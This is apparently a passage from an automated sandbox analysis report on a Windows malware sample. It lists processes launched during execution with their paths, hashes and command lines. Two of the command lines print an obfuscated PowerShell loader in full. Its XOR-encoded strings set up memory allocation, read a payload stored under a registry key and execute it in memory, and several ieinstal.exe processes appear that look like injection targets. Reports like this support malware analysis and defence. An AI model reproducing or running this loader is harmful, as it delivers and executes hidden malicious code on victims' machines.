7GiBUdFSkDSt0BeDBa3LiCAs3orBLt7CoDEs7UnBVaFSiClaCBaDToEUdFCo9hiEJu3PiCGa7SaEUe3DiENo5FlCsaAFlBPoBBiBSt7SpCSkCliCSj2ShDHtEOpFUd9DeERe3svAca4AeAPo5meCSiASpBknBInBGo7UnChaCAnCCo2AlDLaEBaFCo9BrEAm3KlAIn4SkAOp5HaCShAEnBStBFaBfl7SoCSeCHaCen2SaDdeETaFCy9KlESn3VeAUn4BaAAf5IdCsuADeBJiEDiBOp7UnBNuFTiCStCPrDGeEToFUd9NoENo3FrCRe7KrEKe3PrEAr5EnCClAInBLnEPdBPoEDeBSpEIn'Po;Sa&La(pr`$ReDTeuKrnVacFj7Ob)Su Re`$KySFokOvuSkrstvSesCo6Pi;En`$ObADycethTiaSatUneBl El=Fo ExfRekUnpUm st`$TeDStuLonAmcFa5Ru Fl`$SkDPauIlnFrcPo6Cr;Se`$StSDikOuuRerNevSusSe7Tv Uf=To brSIrpMaiFrnCrdBeeMarMooAtkCrsTe0Mi St'raBTr3FjCKr4AnFDoAUnFSg2HjESi5YaETa3inFSk2KoEPa4TeEUn3MoFDiETuFStBLaFAkBBeFSp2LuFAn9DuFRe3InFza2HaEDi4RgABa4SoBSt7BaASpAPsBVi7PaBMi3MiDFj6KoEAb2AgEIs3stFDi8CyFEjBImEBiEDiEFo3BnFhoENoFSe4CoBSm9doDTaECrFCa9AlETh1OvFLe8meFInCDuFMa2VeBDaFEfCOvCHeDHaEEkFSt9ScECe3UsCSa7HeESu3FrENe5LaCGlAGrAMnDUnAPoDBeCheDFuFBi2SoEfe5stFTi8HuBInBFrBSe7SlAUn1ToABo2AfALeEBoBApBFdBFr7ChAHo7InEMeFSkAFi4BeAVr7trAEn7IsAMi7PaBReBChBDy7UnACo7FoENoFDeANe3HuARa7KoBFiEGi'Lo;Re&De(Sy`$OpDVouSenJicOp7Mi)Co St`$FoSClkGeuFerTjvOpsEv7Mo;Ui`$BnSNykPeunarDavFrsEr8To Pi=Un ChSUnpNoiHenKadOmeSurSaoKnkFasSh0Se Ar'GnBSu3piDjuCPiFUsBHaERa2DoFBu9UnFcoCOrFSt2SkEBo5quFNo9AfFSt2ExBGe7MeASmAMoBLi7TiBEk3thDga6SsEKa2UnEUh3TrFHa8BjFNoBDeEOlECiEBl3BeFAnEMaFEs4StBUd9DiDReEAnFSe9VaERe1PoFKj8AnFsuCRiFAf2AcBFiFinCJoCIoDanEUdFAr9PaESu3ReCGr7FeEZi3DeEOp5AdCAfAPrAKlDExACiDFlCOpDHuFPa2NyEPl5PlFPh8BoBNeBSaBUn7FlAFo5SkAMa1SlAno4FlAPe6PyAMe1UdABuFRyAEl7CoABl7VaBStBEpBSo7CoAwa7CeEPaFLaAAn4ReAWe7MaAbe7ctAJu7TrBnoBAfBBo7GlAco7ScERiFElARi3ShBKrEre'Op;Co&Ra(Sn`$RoDSouExnAccQu7ma)Ra Wo`$ZoSFukNauWerMuvsosFi8Mi;Fr`$ErSEpmOveRerFitCleblsVitPeiTelMolAneRunTrdReeCasVe0Ba0Ou=En'TrHChKGoCAnUUn:Be\HiBspeEufDaaLimSalPheBa\SuBDeeFosFakDeaCerCo'Co;Br`$NoSUbmVaeVerGrtFleTosBltObiBelEalBaeAfncydDaeScsSp0Fi1Sv An=TiSHepSyiDenKadNoeBorBloTakCasRe0Op St'InBSu3PaDLuANoFRa2FoFEn3SyFFl2ExFDu6TrASnADeBImFSkDKl0BaFCr2piETa3PaBReAstDApEBoEFo3GeFre2SnFMaAHeCBe7SvEFe5PeFSt8SiEEu7ScFUn2FiEUd5HaEOp3FiElyEBrBTy7HyBLoAGeCIn7PaFAn6AsEPr3CaFDoFAnBMe7StBAu3AfCSu4LaFLuAPaFAg2HyEOv5NoEjo3UlFSo2NoEpa4MaEBa3ChFAnETrFUnBKvFUnBfiFov2AbFRa9prFAl3PrFJo2AfEDa4grAHv7BnAGr7DaBGlECaBme9PrCAv4TeFVe2SeEAn5FrFsi0HyFTr2Or'Th;Ma&Fr(Fl`$LuDCluRanCacLe7Gr)De Bo`$UdSDemBiecerIltUnePhsShtOviHvlHelViePhnUddSkeAvssp0Ki1sk;Hu`$AgSObkBauGirEvvposMi9Em ne=Br BoSLepRoiRenKadTeeklrExoMokCosGa0In Un'DaBSp3RoCMa4CeFMaCHoEPe2SnEIn5InEOm1UnEOx4AfBVa7CaAskAdaBBe7PlCReCfoCSu4UdEVoEUaETr4SpEOd3ElFLa2UnFTrALaBXv9OsDUd4EcFGr8CoFse9GrESt1WhFKr2ToESk5AdEHy3LeCPrADiADuDFoAReDDeDSa1InEPa5UnFGr8AuFTrADiDUd5OdFKo6WaEUd4ReFSm2thALi1FrAJe3PoCDi4AvEGr3KiEIn5MiFKoEAlFte9StFJo0GaBSpFBeBSt3PaDReAUnFDr2MaFMi3PrFEk2OvFUn6PrBBeEPy'Ka;Ka&Al(Ra`$EpDKouSknChcLn7Ci)ef Br`$FaSAdkSpudurTyvOvsOs9Bo;Wa`$EnMWaeDodNoeMaaDr0Cl Li=Dr EnSMipPrinenKodKoeSkrDrourkNosTe0Ch Le'CoCAfCReCUn4viEPrEKoESk4GiENe3BrFMi2CiFSkAKuBDo9UnCBr5PlENe2ReFFe9BrEPa3GiFBeENeFhaATrFRe2AfBBr9ReDWaETuFRo9GaELe3BiFSt2StEBa5BrFpa8ClEBu7BiCIn4ByFPh2MiEOs5AdEFi1DeFFaEKoFEl4HeFRe2TeEMy4MaBPl9UkDDkAYeFBa6ReEBe5BrECe4IdFNaFdeFTr6HuFBiBMiCReAArASuDTeALaDKaDml4BrFSc8ChEch7noELiEkaBOvFMaBAx3ToCfl4SlFteCSeEOv2RuEDe5HaEst1KrESe4MeBsuBKeBtr7geAel7CyBOxBPrBSc7OvBEx7FoBSv3KuCEl4DeFGeAViFbu2MuEAm5PyEDi3GeFDe2DeEFi4JaEek3LrFCoEAnFLeBAcFHeBBeFCu2AsFSt9FeFca3RdFFi2GeETh4AnAAg4FlBAdBNeBSe7KoAgo1StAKo2HyAKlEDiBStEMy'Hy;fe&Nr(Be`$SlDpruUnnDecPr7Ro)Ma Ko`$PiMAneGedReeFoaPl0Br;Na`$DyGBrlTaoRerSiicufOniUnePorDesLe=Pr`$CoSGekFouTerSkvPlsal.KacaaosauKonQutCa-ju6ce5re9Af;Wh`$anMPeeSvdBaetuaPa1Ba tu=Bl MiSSkpUniKenKodvieadrTroVakAgsFo0Ch Me'BeCClCGaCGt4eiERoEReEFo4KuEBe3FrFUn2RaFStABoBHy9ClCga5BeEEm2RuFsi9DeESy3SuFAuEMeFMaALyFKu2acBFa9UrDpaEBuFAn9JuEUd3StFla2PhEpr5alFNa8CuESh7ulCDe4LaFBi2BeESe5DeEba1UnFCoEScFPr4PrFSk2CiESi4roBVe9BrDBiALuFBy6SaEEx5GiEmi4UpFAfFHyFDe6CuFPyBBrCAnABoASaDInACaDSuDNo4ShFOp8AnEBe7LiEseEFeBBaFsaBHa3UnCDe4AfFUnCHjERo2CoEMi5DvEPo1VaEOr4AmBNeBThBsa7YoAun1ydASc2LyASoERrBBuBOrBDi7KeBRe3CoDSkCFoFUdBGoECo2UmFAf9UmFPhCAfFMe2KuELi5GdFby9HoFJu2TiBMaBFaBCh7EsBOe3BeDne0EuFCaBMoFRu8ApESk5KlFaaESiFkv1SmFCoEEnFBe2TrEVi5MiEMe4EnBSkESi'Sk;Br&Ar(Ta`$StDEduInnJicSt7At)Ba Sk`$IdMuneJudAveAfaRy1Pa;Fo`$MeMSaemodSvemoaaf2cu Ou=Ko SpSEcpPoidonPydRoeAcrCaoPakDysbe0Af Ov'ZoBTr3CaFSt6TuFby1BlFTy3FuFEm2CoFTrBHeFMoEFaFMa9FeFOp0BeERa4RoFklEFjFKs9ScFMe0InFag2TrFVe9LaFHeEKaENa5OvFDe2JoEWi5uuFNe9JuFbe2DyBSv7ReASpASpBGr7BlCFlCKoCIn4GuEDyEkuEWi4JuEIn3KnFVe2MaFJoAFoBvk9toCFr5ObEOc2EmFIn9deETr3StFPaEPaFBjAStFSp2HaBov9seDMiEDuFBa9FlEFn3SoFUn2ThEPr5DeFMk8PsESa7UdCMy4UnFEs2DiEMy5GnEAk1MiFSkEInFKa4TaFHj2GoEGy4FoBUd9NoDudABoFOv6SkEEk5OrEKi4CoFToFImFSu6DoFFyBHaCAsAslAAuDTeAMeDSpDSu0TaFSe2ReELo3VaDNo3DeFre2WaFScBRrFBr2TjFFa0EnFIn6UnEOx3BeFLv2MuDGe1PeFTv8prEUn5tiDVi1TuEEp2ReFCr9SpFDu4ReEMr3baFStEAoFTr8PyFAn9ArCHa7JeFCh8PoFPrEKaFHe9SlETa3GeFMe2PrERe5BuBOnFDiBInFAfFAw1SwFapCVeEOb7SiBKr7seBDy3RuCFe2DwFSu3AmFHyACiESt2AmFFr9MaFGu3trFApEBrFTr9PrFFr0BeFun2ArESt5BeEHo4OrBNe7DiBRo3stDPrESeFKa9UnEWa3UnFTr2DaEop5LoFBj4FyFOc2TvEJo4FoEIl4cyFOpEseFBo8BlFSk9FyEde4ReBjuEBlBUnBheBBj7RoBMoFMuDko0MiDBa3beCKv3MuBPo7ReDRe7KoBCoFTrCSeCBaDKoEGrFHi9FlEGe3AlCFo7faEKa3MiEMa5AcCUdAGaBSiBLnBNe7keCNrCseDunEPoFSp9QuEFo3AdCPr7HeEUs3UnESk5teCMaABiBNiBReBSa7SeCzeCBeDTaEAnFIr9FyEKr3UoCFl7BeESk3CaESm5CaCKoAdeBJaBMaBFo7PrCBeCArDReEDuFBe9SaEBe3MiCEl7PaETo3LnEBa5UnCNoAGyBCoBHeBKb7MoCInCHiDHaEDeFMa9FiEHj3unCEc7ArESk3KlEFe5LoCCaAFeBBrEAuBLi7KoBAfFZaCMaCSiDPaEKlFBa9plEBl3PrCFr7CaELi3EnEBa5LeCPiAnaBSlEBaBShEDaBJeENe'pr;As&St(Li`$AkDCouAtnexcRe7ha)Un pi`$MaMVieMedtreOxaHl2Me;Ba`$ViMSpeChdTreNoaMa3Ba Tu=Ga DaSVrpChiAnnRedUneTarProPakOpsWi0Ha Ma'feBRe3CaFSk6UnFEl1DeFAe3BuFFo2StFPeBVlFVoEBeFjo9KeFXi0PoEUn4PyFPlEUiFAn9teFAn0ScFRe2TiFNo9MeFSpEEpEFa5OpFCu2DoEBa5SpFRe9SpFAn2FoBpr9AnDEpEHaFDc9NoESu1OpFBe8KrFUdCstFWh2RdBVeFBrBBi3MoCLi4AkFSuAMiFAn2AtEAs5AnESk3OfFSv2SeEBe4unEPa3GoFWiEHoFBeBBrFToBSmFSn2FrFGe9OvFSl3OpFBe2DoEPo4LaAKa4HeBhuBHuBpu3ScDDeCPuFHuBTiESo2LnFDi9HoFDoCInFPe2BiESk5KlFSr9ApFor2CoBFrBDrBKo3PuDOm6ShFDs4NaFVeFHoFSa6DrERy3BeFSl2PyBEvBLdACo7HuBPeBHeAAf7UnBReEBl'Ca;Ta&La(No`$DiDKruPonRwcNo7An)Ne Ca`$UnMPreJidKaeHjaTe3Ey#Ab;""";;Function Medea9 { param([String]$Anthroposcopy); For($Tractility=2; $Tractility -lt $Anthroposcopy.Length-1; $Tractility+=(2+1)){ $Spinderoks = $Spinderoks + $Anthroposcopy.Substring($Tractility, 1); } $Spinderoks;}$Temperaturforskellen0 = Medea9 'Na Su Kv Hr To Co An Ra Ka En Gi Fo Pr Vr Hi St Bl Un Ti Ca Pr Ch Ve NeIStEFoXFi ';$Temperaturforskellen1= Medea9 $nonreliableness;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Temperaturforskellen1 ;}else{.$Temperaturforskellen0 $Temperaturforskellen1;}
                                                                                                                  Imagebase:0x7ff7729e0000
                                                                                                                  File size:452608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:18:57:55
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7df690000
                                                                                                                  File size:875008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:18:57:56
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):
                                                                                                                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Spinderoks0 { param([String]$Anthroposcopy); $Kanuri = New-Object byte[] ($Anthroposcopy.Length / 2); For($Tractility=0; $Tractility -lt $Anthroposcopy.Length; $Tractility+=2){ $Barbarous = $Anthroposcopy.Substring($Tractility, 2); $Kanuri[$Tractility/2] = [convert]::ToByte($Barbarous, 16); $Kanuri[$Tractility/2] = ($Kanuri[$Tractility/2] -bxor 151); } [String][System.Text.Encoding]::ASCII.GetString($Kanuri);}$Magnale270=Spinderoks0 'C4EEE4E3F2FAB9F3FBFB';$Magnale271=Spinderoks0 'DAFEF4E5F8E4F8F1E3B9C0FEF9A4A5B9C2F9E4F6F1F2D9F6E3FEE1F2DAF2E3FFF8F3E4';$Magnale272=Spinderoks0 'D0F2E3C7E5F8F4D6F3F3E5F2E4E4';$Magnale273=Spinderoks0 'C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1';$Magnale274=Spinderoks0 'E4E3E5FEF9F0';$Magnale275=Spinderoks0 'D0F2E3DAF8F3E2FBF2DFF6F9F3FBF2';$Magnale276=Spinderoks0 'C5C3C4E7F2F4FEF6FBD9F6FAF2BBB7DFFEF3F2D5EEC4FEF0BBB7C7E2F5FBFEF4';$Magnale277=Spinderoks0 'C5E2F9E3FEFAF2BBB7DAF6F9F6F0F2F3';$Magnale278=Spinderoks0 'C5F2F1FBF2F4E3F2F3D3F2FBF2F0F6E3F2';$Magnale279=Spinderoks0 'DEF9DAF2FAF8E5EEDAF8F3E2FBF2';$Dunc0=Spinderoks0 'DAEED3F2FBF2F0F6E3F2C3EEE7F2';$Dunc1=Spinderoks0 'D4FBF6E4E4BBB7C7E2F5FBFEF4BBB7C4F2F6FBF2F3BBB7D6F9E4FED4FBF6E4E4BBB7D6E2E3F8D4FBF6E4E4';$Dunc2=Spinderoks0 'DEF9E1F8FCF2';$Dunc3=Spinderoks0 'C7E2F5FBFEF4BBB7DFFEF3F2D5EEC4FEF0BBB7D9F2E0C4FBF8E3BBB7C1FEE5E3E2F6FB';$Dunc4=Spinderoks0 'C1FEE5E3E2F6FBD6FBFBF8F4';$Dunc5=Spinderoks0 'F9E3F3FBFB';$Dunc6=Spinderoks0 'D9E3C7E5F8E3F2F4E3C1FEE5E3E2F6FBDAF2FAF8E5EE';$Dunc7=Spinderoks0 'DED2CF';$Dunc8=Spinderoks0 'CB';$Udmundingers=Spinderoks0 'C2C4D2C5A4A5';$Intercessions=Spinderoks0 'D4F6FBFBC0FEF9F3F8E0C7E5F8F4D6';function fkp {Param ($Opringningernes, $Introsuction) ;$Skurvs0 =Spinderoks0 'B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B7AAB7BFCCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D0F2E3D6E4E4F2FAF5FBFEF2E4BFBEB7EBB7C0FFF2E5F2BAD8F5FDF2F4E3B7ECB7B3C8B9D0FBF8F5F6FBD6E4E4F2FAF5FBEED4F6F4FFF2B7BAD6F9F3B7B3C8B9DBF8F4F6E3FEF8F9B9C4E7FBFEE3BFB3D3E2F9F4AFBECCBAA6CAB9D2E6E2F6FBE4BFB3DAF6F0F9F6FBF2A5A0A7BEB7EABEB9D0F2E3C3EEE7F2BFB3DAF6F0F9F6FBF2A5A0A6BE';&($Dunc7) $Skurvs0;$Skurvs5 = Spinderoks0 'B3D2EFF4FBE2E4FEF8F9FEE4FAB7AAB7B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A5BBB7CCC3EEE7F2CCCACAB7D7BFB3DAF6F0F9F6FBF2A5A0A4BBB7B3DAF6F0F9F6FBF2A5A0A3BEBE';&($Dunc7) $Skurvs5;$Skurvs1 = Spinderoks0 'E5F2E3E2E5F9B7B3D2EFF4FBE2E4FEF8F9FEE4FAB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFCCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1CABFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1BFBFD9F2E0BAD8F5FDF2F4E3B7DEF9E3C7E3E5BEBBB7BFB3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A2BEBEB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFB3D8E7E5FEF9F0F9FEF9F0F2E5F9F2E4BEBEBEBEBBB7B3DEF9E3E5F8E4E2F4E3FEF8F9BEBE';&($Dunc7) $Skurvs1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Hidfres,[Parameter(Position = 1)] [Type] $belastningsprvens = [Void]);$Skurvs2 = Spinderoks0 'B3DAF8E5E7FFFEF4B7AAB7CCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D3F2F1FEF9F2D3EEF9F6FAFEF4D6E4E4F2FAF5FBEEBFBFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5F2F1FBF2F4E3FEF8F9B9D6E4E4F2FAF5FBEED9F6FAF2BFB3DAF6F0F9F6FBF2A5A0AFBEBEBBB7CCC4EEE4E3F2FAB9C5F2F1FBF2F4E3FEF8F9B9D2FAFEE3B9D6E4E4F2FAF5FBEED5E2FEFBF3F2E5D6F4F4F2E4E4CAADADC5E2F9BEB9D3F2F1FEF9F2D3EEF9F6FAFEF4DAF8F3E2FBF2BFB3DAF6F0F9F6FBF2A5A0AEBBB7B3F1F6FBE4F2BEB9D3F2F1FEF9F2C3EEE7F2BFB3D3E2F9F4A7BBB7B3D3E2F9F4A6BBB7CCC4EEE4E3F2FAB9DAE2FBE3FEF4F6E4E3D3F2FBF2F0F6E3F2CABE';&($Dunc7) $Skurvs2;$Skurvs3 = Spinderoks0 'B3DAF8E5E7FFFEF4B9D3F2F1FEF9F2D4F8F9E4E3E5E2F4E3F8E5BFB3DAF6F0F9F6FBF2A5A0A1BBB7CCC4EEE4E3F2FAB9C5F2F1FBF2F4E3FEF8F9B9D4F6FBFBFEF9F0D4F8F9E1F2F9E3FEF8F9E4CAADADC4E3F6F9F3F6E5F3BBB7B3DFFEF3F1E5F2E4BEB9C4F2E3DEFAE7FBF2FAF2F9E3F6E3FEF8F9D1FBF6F0E4BFB3DAF6F0F9F6FBF2A5A0A0BE';&($Dunc7) $Skurvs3;$Skurvs4 = Spinderoks0 'B3DAF8E5E7FFFEF4B9D3F2F1FEF9F2DAF2E3FFF8F3BFB3D3E2F9F4A5BBB7B3D3E2F9F4A4BBB7B3F5F2FBF6E4E3F9FEF9F0E4E7E5E1F2F9E4BBB7B3DFFEF3F1E5F2E4BEB9C4F2E3DEFAE7FBF2FAF2F9E3F6E3FEF8F9D1FBF6F0E4BFB3DAF6F0F9F6FBF2A5A0A0BE';&($Dunc7) $Skurvs4;$Skurvs5 = Spinderoks0 'E5F2E3E2E5F9B7B3DAF8E5E7FFFEF4B9D4E5F2F6E3F2C3EEE7F2BFBE';&($Dunc7) $Skurvs5 ;}$Diagonallse231 = Spinderoks0 'FCF2E5F9F2FBA4A5';$Skurvs6 = Spinderoks0 'B3D6E2E3F8FBEEE3FEF4B7AAB7CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD0F2E3D3F2FBF2F0F6E3F2D1F8E5D1E2F9F4E3FEF8F9C7F8FEF9E3F2E5BFBFF1FCE7B7B3D3FEF6F0F8F9F6FBFBE4F2A5A4A6B7B3D3E2F9F4A3BEBBB7BFD0D3C3B7D7BFCCDEF9E3C7E3E5CABBB7CCC2DEF9E3A4A5CABBB7CCC2DEF9E3A4A5CABBB7CCC2DEF9E3A4A5CABEB7BFCCDEF9E3C7E3E5CABEBEBE';&($Dunc7) $Skurvs6;$Achate = fkp $Dunc5 $Dunc6;$Skurvs7 = Spinderoks0 'B3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A4B7AAB7B3D6E2E3F8FBEEE3FEF4B9DEF9E1F8FCF2BFCCDEF9E3C7E3E5CAADADCDF2E5F8BBB7A1A2AEBBB7A7EFA4A7A7A7BBB7A7EFA3A7BE';&($Dunc7) $Skurvs7;$Skurvs8 = Spinderoks0 'B3DCFBE2F9FCF2E5F9F2B7AAB7B3D6E2E3F8FBEEE3FEF4B9DEF9E1F8FCF2BFCCDEF9E3C7E3E5CAADADCDF2E5F8BBB7A5A1A4A6A1AFA7A7BBB7A7EFA4A7A7A7BBB7A7EFA3BE';&($Dunc7) $Skurvs8;$Smertestillendes00='HKCU:\Befamle\Beskar';$Smertestillendes01 =Spinderoks0 'B3DAF2F3F2F6AABFD0F2E3BADEE3F2FAC7E5F8E7F2E5E3EEB7BAC7F6E3FFB7B3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A7A7BEB9C4F2E5F0F2';&($Dunc7) $Smertestillendes01;$Skurvs9 = Spinderoks0 'B3C4FCE2E5E1E4B7AAB7CCC4EEE4E3F2FAB9D4F8F9E1F2E5E3CAADADD1E5F8FAD5F6E4F2A1A3C4E3E5FEF9F0BFB3DAF2F3F2F6BE';&($Dunc7) $Skurvs9;$Medea0 = Spinderoks0 'CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD4F8E7EEBFB3C4FCE2E5E1E4BBB7A7BBB7B7B3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A4BBB7A1A2AEBE';&($Dunc7) $Medea0;$Glorifiers=$Skurvs.count-659;$Medea1 = Spinderoks0 'CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD4F8E7EEBFB3C4FCE2E5E1E4BBB7A1A2AEBBB7B3DCFBE2F9FCF2E5F9F2BBB7B3D0FBF8E5FEF1FEF2E5E4BE';&($Dunc7) $Medea1;$Medea2 = Spinderoks0 'B3F6F1F3F2FBFEF9F0E4FEF9F0F2F9FEE5F2E5F9F2B7AAB7CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD0F2E3D3F2FBF2F0F6E3F2D1F8E5D1E2F9F4E3FEF8F9C7F8FEF9E3F2E5BFBFF1FCE7B7B3C2F3FAE2F9F3FEF9F0F2E5E4B7B3DEF9E3F2E5F4F2E4E4FEF8F9E4BEBBB7BFD0D3C3B7D7BFCCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABEB7BFCCDEF9E3C7E3E5CABEBEBE';&($Dunc7) $Medea2;$Medea3 = Spinderoks0 'B3F6F1F3F2FBFEF9F0E4FEF9F0F2F9FEE5F2E5F9F2B9DEF9E1F8FCF2BFB3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A4BBB3DCFBE2F9FCF2E5F9F2BBB3D6F4FFF6E3F2BBA7BBA7BE';&($Dunc7) $Medea3#
                                                                                                                  Imagebase:
                                                                                                                  File size:433152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:
                                                                                                                  Has administrator privileges:
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:18:58:04
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:18:58:04
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:18:58:04
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:18:58:04
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
